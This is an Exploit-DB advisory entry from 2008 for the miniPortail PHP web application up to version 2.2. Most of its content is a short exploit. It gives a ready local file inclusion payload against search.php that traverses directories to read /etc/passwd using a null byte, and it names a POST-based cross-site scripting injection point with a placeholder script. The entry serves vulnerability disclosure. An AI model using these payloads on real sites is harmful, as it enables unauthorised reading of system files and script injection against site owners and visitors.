miniPortail <= 2.2 XSS/LFI Remote Vulnerabilities

2008-10-23T00:00:00
ID EDB-ID:6821
Type exploitdb
Reporter StAkeR
Modified 2008-10-23T00:00:00

Description

miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities. CVE-2008-6167,CVE-2008-6168. Webapps exploit for php platform

                                        
                                            /*

   miniPortail &lt;= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (&lt;script&gt;[javascript]&lt;/script&gt;)
   
*/

# milw0rm.com [2008-10-23]